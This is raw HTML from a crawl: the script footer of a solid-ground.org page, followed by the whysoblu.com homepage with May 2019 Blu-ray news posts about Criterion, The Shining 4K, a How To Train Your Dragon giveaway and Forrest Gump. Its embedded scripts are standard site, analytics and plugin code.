src='https://s14621.pcdn.co/wp-includes/js/comment-reply.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-includes/js/hoverIntent.min.js?ver=1.8.1'></script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-content/themes/genesis/lib/js/menu/superfish.min.js?ver=1535055576'></script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-content/themes/genesis/lib/js/menu/superfish.args.min.js?ver=1535055576'></script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-content/themes/dist/js/javascript.min.js?ver=1535055576'></script> <script type='text/javascript'> /* <![CDATA[ */ var allajax = {"nonce":"752634940f","ajaxurl":"https:\/\/www.solid-ground.org\/wp-admin\/admin-ajax.php","query_vars":"[]"}; /* ]]> */ </script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-content/themes/dist/js/custom/all-ajax.js?ver=1535055576'></script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-content/plugins/lazy-load/js/jquery.sonar.min.js?ver=0.6.1'></script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-content/plugins/lazy-load/js/lazy-load.js?ver=0.6.1'></script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-content/plugins/jetpack/_inc/build/spin.min.js?ver=1.3'></script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-content/plugins/jetpack/_inc/build/jquery.spin.min.js?ver=1.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/www.solid-ground.org\/wp-admin\/admin-ajax.php","nonce":"14877609f3","display_exif":"0","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/www.solid-ground.org\/wp-login.php?redirect_to=https%3A%2F%2Fwww.solid-ground.org%2Frsvp-ambassadors-2019%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"}; /* ]]> */ </script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-content/plugins/jetpack/_inc/build/carousel/jetpack-carousel.min.js?ver=20190102'></script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-content/plugins/gravityforms/js/jquery.json.min.js?ver=2.4.9'></script> <script type='text/javascript'> /* <![CDATA[ */ var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2},"base_url":"https:\/\/www.solid-ground.org\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/www.solid-ground.org\/wp-content\/plugins\/gravityforms\/images\/spinner.gif"}; /* ]]> */ </script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-content/plugins/gravityforms/js/gravityforms.min.js?ver=2.4.9'></script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-content/plugins/gravityforms/js/placeholders.jquery.min.js?ver=2.4.9'></script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3.1',blog:'105651989',post:'25',tz:'-7',srv:'www.solid-ground.org'} ]); _stq.push([ 'clickTrackerInit', '105651989', '25' ]); </script> </body></html>
0
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" prefix="og: http://ogp.me/ns#"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Why So Blu?</title> <meta name="generator" content="WordPress 4.9.8" /> <meta name="keywords" content="blu-ray,blu,blu-ray disc,bluray,bluray disc,blueray,blue-ray,playstation,ps3,movie review,comics,blue-ray disc,blu-ray dvd,bluray dvd,comic-con"> <meta name="alexaVerifyID" content="iS54bmuCjykM4yUHSzUvj26sFQY" /> <link rel="stylesheet" href="http://whysoblu.com/wp-content/themes/unnamed-lite/style.css" type="text/css" media="screen" /> <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://whysoblu.com/feed/" /> <link rel="alternate" type="text/xml" title="RSS .92" href="http://whysoblu.com/feed/rss/" /> <link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="http://whysoblu.com/feed/atom/" /> <link rel="alternate" type="application/atom+xml" title="Comments Rss" href="http://whysoblu.com/comments/feed/" /> <!-- Quantcast Tag --> <script type="text/javascript"> var _qevents = _qevents || []; (function() { var elem = document.createElement('script'); elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js"; elem.async = true; elem.type = "text/javascript"; var scpt = document.getElementsByTagName('script')[0]; scpt.parentNode.insertBefore(elem, scpt); })(); _qevents.push({ qacct:"p-da87oYRIq8AMQ" }); </script> <noscript> <div style="display:none;"> <img src="//pixel.quantserve.com/pixel/p-da87oYRIq8AMQ.gif" border="0" height="1" width="1" alt="Quantcast"/> </div> </noscript> <!-- End Quantcast tag --> <!-- This site is optimized with the Yoast SEO plugin v5.4.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="The latest entertainment news in Blu-ray, movies, games, comics and more..."/> <link rel="canonical" href="http://whysoblu.com/" /> <link rel="next" href="http://whysoblu.com/page/2/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Why So Blu? | The latest entertainment news in Blu-ray, movies, games, comics and more..." /> <meta property="og:description" content="The latest entertainment news in Blu-ray, movies, games, comics and more..." /> <meta property="og:url" content="http://whysoblu.com/" /> <meta property="og:site_name" content="Why So Blu?" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="The latest entertainment news in Blu-ray, movies, games, comics and more..." /> <meta name="twitter:title" content="Why So Blu? | The latest entertainment news in Blu-ray, movies, games, comics and more..." /> <meta name="twitter:site" content="@whysoblu" /> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"http:\/\/whysoblu.com\/","name":"Why So Blu?","potentialAction":{"@type":"SearchAction","target":"http:\/\/whysoblu.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//assets.pinterest.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/whysoblu.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='pinterest-pin-it-button-plugin-styles-css' href='http://whysoblu.com/wp-content/plugins/pinterest-pin-it-button/css/public.css?ver=2.1.0.1' type='text/css' media='all' /> <link rel='stylesheet' id='cntctfrm_form_style-css' href='http://whysoblu.com/wp-content/plugins/contact-form-plugin/css/form_style.css?ver=4.0.7' type='text/css' media='all' /> <link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://whysoblu.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.14' type='text/css' media='all' /> <!-- This site uses the Google Analytics by MonsterInsights plugin v6.1.10 - Using Analytics tracking - https://www.monsterinsights.com/ --> <script type="text/javascript" data-cfasync="false"> /* Function to detect opted out users */ function __gaTrackerIsOptedOut() { return document.cookie.indexOf(disableStr + '=true') > -1; } /* Disable tracking if the opt-out cookie exists. */ var disableStr = 'ga-disable-UA-6807065-1'; if ( __gaTrackerIsOptedOut() ) { window[disableStr] = true; } /* Opt-out function */ function __gaTrackerOptout() { document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true; } (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-6807065-1', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('send','pageview'); </script> <!-- / Google Analytics by MonsterInsights --> <script type='text/javascript' src='http://whysoblu.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://whysoblu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://whysoblu.com/wp-content/plugins/add-to-any/addtoany.min.js?ver=1.0'></script> <link rel='https://api.w.org/' href='http://whysoblu.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://whysoblu.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://whysoblu.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.8" /> <script type="text/javascript"> var a2a_config=a2a_config||{};a2a_config.callbacks=a2a_config.callbacks||[];a2a_config.templates=a2a_config.templates||{}; </script> <script type="text/javascript" src="https://static.addtoany.com/menu/page.js" async="async"></script> <style type="text/css"> body { color:#333333; background: #3399FF; } a, a:link, a:active, a:visited { color:#5D8BB3; } a:hover { color:#3465A4; } h1, h2, h3, h4 { color:#333333; } #header { height:100px; background:url(http://whysoblu.com/wp-content/uploads/2019/04/WSB-Header-Editable-File-May-2019.jpg) transparent repeat top center; } #header h1, .description { display:none; } #content { background:#FFFFFF; } </style> <link rel="icon" href="http://whysoblu.com/wp-content/uploads/2015/08/cropped-1620988_10152262959856842_911782437_n-32x32.jpg" sizes="32x32" /> <link rel="icon" href="http://whysoblu.com/wp-content/uploads/2015/08/cropped-1620988_10152262959856842_911782437_n-192x192.jpg" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="http://whysoblu.com/wp-content/uploads/2015/08/cropped-1620988_10152262959856842_911782437_n-180x180.jpg" /> <meta name="msapplication-TileImage" content="http://whysoblu.com/wp-content/uploads/2015/08/cropped-1620988_10152262959856842_911782437_n-270x270.jpg" /> </head> <body> <div id="container"> <ul id="nav"> <li class="current_page_item"> <a href="http://whysoblu.com/" title="Home"> Home </a> </li> <li class="page_item page-item-2"><a href="http://whysoblu.com/about/">About</a></li> <li class="page_item page-item-2322"><a href="http://whysoblu.com/advertise/">Advertise</a></li> <li class="page_item page-item-35"><a href="http://whysoblu.com/contact/">Contact</a></li> <li class="page_item page-item-41"><a href="http://whysoblu.com/faqs/">FAQs</a></li> <li class="page_item page-item-44"><a href="http://whysoblu.com/links/">Friends</a></li> <li class="page_item page-item-5579"><a href="http://whysoblu.com/staff/">Staff</a></li> </ul> <div id="header"> <h1><a href="http://whysoblu.com/"> Why So Blu? </a></h1> <p class="description"> The latest entertainment news in Blu-ray, movies, games, comics and more&#8230; </p> </div> <div id="content"> <div class="content-top"></div> <hr /> <div id="primary-content"> <div id="post-136763" class="entry"> <h3 class="entry-header"><a href="http://whysoblu.com/ozu-sirk-campion-coming-criterion-collection-august-2019/" rel="bookmark" title='Permanent Link to "Ozu, Sirk, Campion &#038; More Coming to The Criterion Collection in August 2019"'> Ozu, Sirk, Campion &#038; More Coming to The Criterion Collection in August 2019</a></h3> <div class="entry-date"> May 15th, 2019 by Aaron Neuwirth </div> <p style="text-align: justify;"><img class="alignleft wp-image-136769 size-thumbnail" style="margin-right: 10px;" src="http://whysoblu.com/wp-content/uploads/2019/05/obsession-160x160.jpg" alt="" width="160" height="160" />This August, Abbas Kiarostami&#8217;s <strong><em>The Koker Trilogy</em></strong>, an eye-opening triptych of playful films that blend fiction and reality, will join T<strong>he Criterion Collection</strong>, bringing three of the Iranian master&#8217;s most sought-after works to Blu-ray for the first time. <strong><em>The Flavor of Green Tea over Rice</em></strong>, Yasujiro Ozu&#8217;s beautifully observed study of a marriage on the rocks, will appear in an edition that also features Ozu&#8217;s 1937 film <strong><em>What Did the Lady Forget?</em></strong> Lucille Carra&#8217;s <strong><em>The Inland Sea</em></strong>, a poetic and insightful meditation on tradition and self-discovery, based on Donald Richie&#8217;s renowned travelogue on Japan, will come out in a new, restored 4K digital transfer. And that&#8217;s not all: Jane Campion&#8217;s revelatory biopic <strong><em>An Angel at My Table</em></strong> and Douglas Sirk&#8217;s delirious melodrama <strong><em>Magnificent Obsession</em></strong> will appear on Blu-ray.</p> <p style="text-align: justify;"><span style="color: #ffffff;">&#8211;</span> <a href="http://whysoblu.com/ozu-sirk-campion-coming-criterion-collection-august-2019/#more-136763" class="more-link">Continue reading &#8216;Ozu, Sirk, Campion &#038; More Coming to The Criterion Collection in August 2019&#8217;</a></p> <div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fwhysoblu.com%2Fozu-sirk-campion-coming-criterion-collection-august-2019%2F&media=http%3A%2F%2Fwhysoblu.com%2Fwp-content%2Fuploads%2F2019%2F05%2Fobsession-160x160.jpg&description=Ozu%2C%20Sirk%2C%20Campion%20%26%20More%20Coming%20to%20The%20Criterion%20Collection%20in%20August%202019" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://whysoblu.com/ozu-sirk-campion-coming-criterion-collection-august-2019/" dc:identifier="http://whysoblu.com/ozu-sirk-campion-coming-criterion-collection-august-2019/" dc:title="Ozu, Sirk, Campion &#038; More Coming to The Criterion Collection in August 2019" trackback:ping="http://whysoblu.com/ozu-sirk-campion-coming-criterion-collection-august-2019/trackback/" /> </rdf:RDF> --> <div class="entry-footer"> <span class="metatag">Tags: <a href="http://whysoblu.com/tag/abbas-kiarostami/" rel="tag">Abbas Kiarostami</a>, <a href="http://whysoblu.com/tag/criterion/" rel="tag">Criterion</a>, <a href="http://whysoblu.com/tag/criterion-collection/" rel="tag">Criterion Collection</a>, <a href="http://whysoblu.com/tag/douglas-sirk/" rel="tag">Douglas Sirk</a>, <a href="http://whysoblu.com/tag/jane-campion/" rel="tag">Jane Campion</a>, <a href="http://whysoblu.com/tag/lucille-carra/" rel="tag">Lucille Carra</a>, <a href="http://whysoblu.com/tag/the-criterion-collection/" rel="tag">The Criterion Collection</a>, <a href="http://whysoblu.com/tag/yasujiro-ozu/" rel="tag">yasujiro ozu</a>.</span> <span class="metacat"><a href="http://whysoblu.com/category/amazon-pre-orders/" rel="category tag">Amazon Pre-Orders</a>,<a href="http://whysoblu.com/category/news/" rel="category tag">News</a>,<a href="http://whysoblu.com/category/news/pr/" rel="category tag">Press Release</a>,<a href="http://whysoblu.com/category/the-criterion-collection/" rel="category tag">The Criterion Collection</a></span> <a href="http://whysoblu.com/ozu-sirk-campion-coming-criterion-collection-august-2019/#respond">&nbsp;&nbsp;<span class="metacmt">Add a comment</span></a> </div> </div> <div id="post-136759" class="entry"> <h3 class="entry-header"><a href="http://whysoblu.com/horror-masterpiece-stanley-kubricks-shining-arrives-4k-ultra-hd-blu-ray-october-1st/" rel="bookmark" title='Permanent Link to "Horror Masterpiece Stanley Kubrick&#8217;s THE SHINING Arrives On 4K Ultra-HD Blu-ray October 1st!"'> Horror Masterpiece Stanley Kubrick&#8217;s THE SHINING Arrives On 4K Ultra-HD Blu-ray October 1st!</a></h3> <div class="entry-date"> May 15th, 2019 by Brandon Peters </div> <p class="yiv4658619394MsoNormal" style="text-align: justify;"><img class="alignleft wp-image-136760 size-full" style="margin-right: 10px;" title="Horror Masterpiece Stanley Kubrick's THE SHINING Arrives On 4K Ultra-HD Blu-ray October 1st!" src="http://whysoblu.com/wp-content/uploads/2019/05/The-Shining.jpg" alt="" width="160" height="160" />Warner Bros. Home Entertainment announced today that <b><i>The Shining, </i></b>Stanley Kubrick’s terrifying 1980 horror masterpiece, will be released on Ultra HD Blu-ray and Digital on October 1.  The 4K remastering is of Kubrick’s original 146 minute version of the film which premiered in the United States on May 23<sup>rd</sup>, 1980. Now widely regarded as one of the greatest horror films ever made, <b><i>The Shining</i></b> was directed and produced by Kubrick, who wrote the screenplay with Diane Johnson.  The film was based on the novel “The Shining” by Stephen King, and stars Jack Nicholson in an iconic role as Jack Torrance, Shelley Duval as Wendy Torrance, Scatman Crothers as Dick Halloran, and Danny Lloyd as Danny Torrance.  <a href="http://whysoblu.com/horror-masterpiece-stanley-kubricks-shining-arrives-4k-ultra-hd-blu-ray-october-1st/#more-136759" class="more-link">Continue reading &#8216;Horror Masterpiece Stanley Kubrick&#8217;s THE SHINING Arrives On 4K Ultra-HD Blu-ray October 1st!&#8217;</a></p> <div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fwhysoblu.com%2Fhorror-masterpiece-stanley-kubricks-shining-arrives-4k-ultra-hd-blu-ray-october-1st%2F&media=http%3A%2F%2Fwhysoblu.com%2Fwp-content%2Fuploads%2F2019%2F05%2FThe-Shining.jpg&description=Horror%20Masterpiece%20Stanley%20Kubrick%27s%20THE%20SHINING%20Arrives%20On%204K%20Ultra-HD%20Blu-ray%20October%201st%21" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://whysoblu.com/horror-masterpiece-stanley-kubricks-shining-arrives-4k-ultra-hd-blu-ray-october-1st/" dc:identifier="http://whysoblu.com/horror-masterpiece-stanley-kubricks-shining-arrives-4k-ultra-hd-blu-ray-october-1st/" dc:title="Horror Masterpiece Stanley Kubrick&#8217;s THE SHINING Arrives On 4K Ultra-HD Blu-ray October 1st!" trackback:ping="http://whysoblu.com/horror-masterpiece-stanley-kubricks-shining-arrives-4k-ultra-hd-blu-ray-october-1st/trackback/" /> </rdf:RDF> --> <div class="entry-footer"> <span class="metatag">Tags: <a href="http://whysoblu.com/tag/jack-nicholson/" rel="tag">Jack Nicholson</a>, <a href="http://whysoblu.com/tag/scatman-crothers/" rel="tag">Scatman Crothers</a>, <a href="http://whysoblu.com/tag/shelley-duvall/" rel="tag">Shelley Duvall</a>, <a href="http://whysoblu.com/tag/stanley-kubrick/" rel="tag">Stanley Kubrick</a>.</span> <span class="metacat"><a href="http://whysoblu.com/category/news/" rel="category tag">News</a>,<a href="http://whysoblu.com/category/news/pr/" rel="category tag">Press Release</a></span> <a href="http://whysoblu.com/horror-masterpiece-stanley-kubricks-shining-arrives-4k-ultra-hd-blu-ray-october-1st/#respond">&nbsp;&nbsp;<span class="metacmt">Add a comment</span></a> </div> </div> <div id="post-136754" class="entry"> <h3 class="entry-header"><a href="http://whysoblu.com/giveaway-train-dragon-1-3-collection-blu-ray-soundtrack/" rel="bookmark" title='Permanent Link to "GIVEAWAY: How To Train Your Dragon 1-3 Collection Blu-ray &#038; Soundtrack!"'> GIVEAWAY: How To Train Your Dragon 1-3 Collection Blu-ray &#038; Soundtrack!</a></h3> <div class="entry-date"> May 15th, 2019 by Brandon Peters </div> <p style="text-align: justify;"><img class="alignleft wp-image-136755 size-full" style="margin-right: 10px;" title="GIVEAWAY: How To Train Your Dragon 1-3 Collection Blu-ray &amp; Soundtrack!" src="http://whysoblu.com/wp-content/uploads/2019/05/How-To-Train-Your-Dragon-Collection.jpg" alt="" width="160" height="160" />Next week (May 21st) sees the debut of the final installment of <strong>How To Train Your Dragon</strong>, entitled <strong>The Hidden World</strong>, arriving on Blu-ray and 4K Ultra-HD Blu-ray. I&#8217;ve long been a fan of this series and I&#8217;d love to share my endearment of it with one lucky reader here. We are going to be giving away a copy of the <strong>How To Train Your Dragon 1-3 Blu-ray Collection</strong> and the soundtrack for <strong>How to Train Your Dragon: The Hidden World</strong>. All you have to do is enter. Take a look after the jump so you can see the details for the contest. This wonderful <strong><span style="color: #ff0000;">C</span><span style="color: #ff0000;">ontest ends MONDAY, MAY 20th</span></strong>! <a href="http://whysoblu.com/giveaway-train-dragon-1-3-collection-blu-ray-soundtrack/#more-136754" class="more-link">Continue reading &#8216;GIVEAWAY: How To Train Your Dragon 1-3 Collection Blu-ray &#038; Soundtrack!&#8217;</a></p> <div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fwhysoblu.com%2Fgiveaway-train-dragon-1-3-collection-blu-ray-soundtrack%2F&media=http%3A%2F%2Fwhysoblu.com%2Fwp-content%2Fuploads%2F2019%2F05%2FHow-To-Train-Your-Dragon-Collection.jpg&description=GIVEAWAY%3A%20How%20To%20Train%20Your%20Dragon%201-3%20Collection%20Blu-ray%20%26%20Soundtrack%21" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://whysoblu.com/giveaway-train-dragon-1-3-collection-blu-ray-soundtrack/" dc:identifier="http://whysoblu.com/giveaway-train-dragon-1-3-collection-blu-ray-soundtrack/" dc:title="GIVEAWAY: How To Train Your Dragon 1-3 Collection Blu-ray &#038; Soundtrack!" trackback:ping="http://whysoblu.com/giveaway-train-dragon-1-3-collection-blu-ray-soundtrack/trackback/" /> </rdf:RDF> --> <div class="entry-footer"> <span class="metatag">Tags: <a href="http://whysoblu.com/tag/how-to-train-your-dragon/" rel="tag">How To Train Your Dragon</a>.</span> <span class="metacat"><a href="http://whysoblu.com/category/contests/" rel="category tag">Contests</a></span> <a href="http://whysoblu.com/giveaway-train-dragon-1-3-collection-blu-ray-soundtrack/#respond">&nbsp;&nbsp;<span class="metacmt">Add a comment</span></a> </div> </div> <div id="post-136749" class="entry"> <h3 class="entry-header"><a href="http://whysoblu.com/forrest-gump-25th-anniversary-national-mall-screening-newly-remastered-blu-ray-film-select-theaters/" rel="bookmark" title='Permanent Link to "FORREST GUMP 25th Anniversary- National Mall Screening, Newly Remastered Blu-ray &#038; Film In Select Theaters"'> FORREST GUMP 25th Anniversary- National Mall Screening, Newly Remastered Blu-ray &#038; Film In Select Theaters</a></h3> <div class="entry-date"> May 14th, 2019 by Brandon Peters </div> <div dir="ltr"> <div class="yiv3772472067WordSection1"> <p class="yiv3772472067MsoNormal" style="text-align: justify;"><img class="alignleft wp-image-136750 size-full" style="margin-right: 10px;" title="FORREST GUMP 25th Anniversary- National Mall Screening, Newly Remastered Blu-ray &amp; Film In Select Theaters" src="http://whysoblu.com/wp-content/uploads/2019/05/Forrest-Gump-25.jpg" alt="" width="160" height="160" />In 1994 moviegoers met a man named Forrest Gump whose story was both a deeply personal and affecting odyssey and a universal meditation on our times.  Hailed as “magical” (Roger Ebert, <u>Chicago Sun-Times</u>) and filled with “startling grace” (Peter Travers, <u>Rolling Stone</u>), <b><i>FORREST GUMP</i></b> became not only a global blockbuster, but a true cultural touchstone.  25 years later, <b><i>FORREST GUMP</i></b><i> </i>remains a treasured cinematic classic that is beloved and quoted the world over.  Tom Hanks gives an astonishing performance as Forrest, an everyman whose simple innocence comes to embody a generation.  Alongside his mamma (Sally Field), his best friend Bubba (Mykelti Williamson), his commanding officer Lieutenant Dan (Gary Sinise), and his favorite girl Jenny (Robin Wright), Forrest has a ringside seat for the most memorable events of the second half of the 20th century.</p> </div> </div> <p> <a href="http://whysoblu.com/forrest-gump-25th-anniversary-national-mall-screening-newly-remastered-blu-ray-film-select-theaters/#more-136749" class="more-link">Continue reading &#8216;FORREST GUMP 25th Anniversary- National Mall Screening, Newly Remastered Blu-ray &#038; Film In Select Theaters&#8217;</a></p> <div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fwhysoblu.com%2Fforrest-gump-25th-anniversary-national-mall-screening-newly-remastered-blu-ray-film-select-theaters%2F&media=http%3A%2F%2Fwhysoblu.com%2Fwp-content%2Fuploads%2F2019%2F05%2FForrest-Gump-25.jpg&description=FORREST%20GUMP%2025th%20Anniversary-%20National%20Mall%20Screening%2C%20Newly%20Remastered%20Blu-ray%20%26%20Film%20In%20Select%20Theaters" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://whysoblu.com/forrest-gump-25th-anniversary-national-mall-screening-newly-remastered-blu-ray-film-select-theaters/" dc:identifier="http://whysoblu.com/forrest-gump-25th-anniversary-national-mall-screening-newly-remastered-blu-ray-film-select-theaters/" dc:title="FORREST GUMP 25th Anniversary- National Mall Screening, Newly Remastered Blu-ray &#038; Film In Select Theaters" trackback:ping="http://whysoblu.com/forrest-gump-25th-anniversary-national-mall-screening-newly-remastered-blu-ray-film-select-theaters/trackback/" /> </rdf:RDF> --> <div class="entry-footer"> <span class="metatag">Tags: <a href="http://whysoblu.com/tag/tom-hanks/" rel="tag">Tom Hanks</a>.</span> <span class="metacat"><a href="http://whysoblu.com/category/news/" rel="category tag">News</a>,<a href="http://whysoblu.com/category/news/pr/" rel="category tag">Press Release</a></span> <a href="http://whysoblu.com/forrest-gump-25th-anniversary-national-mall-screening-newly-remastered-blu-ray-film-select-theaters/#respond">&nbsp;&nbsp;<span class="metacmt">Add a comment</span></a> </div> </div> <div id="post-136745" class="entry"> <h3 class="entry-header"><a href="http://whysoblu.com/ill-take-dead-arrives-blu-ray-june-4th/" rel="bookmark" title='Permanent Link to "I&#8217;LL TAKE YOUR DEAD Arrives On 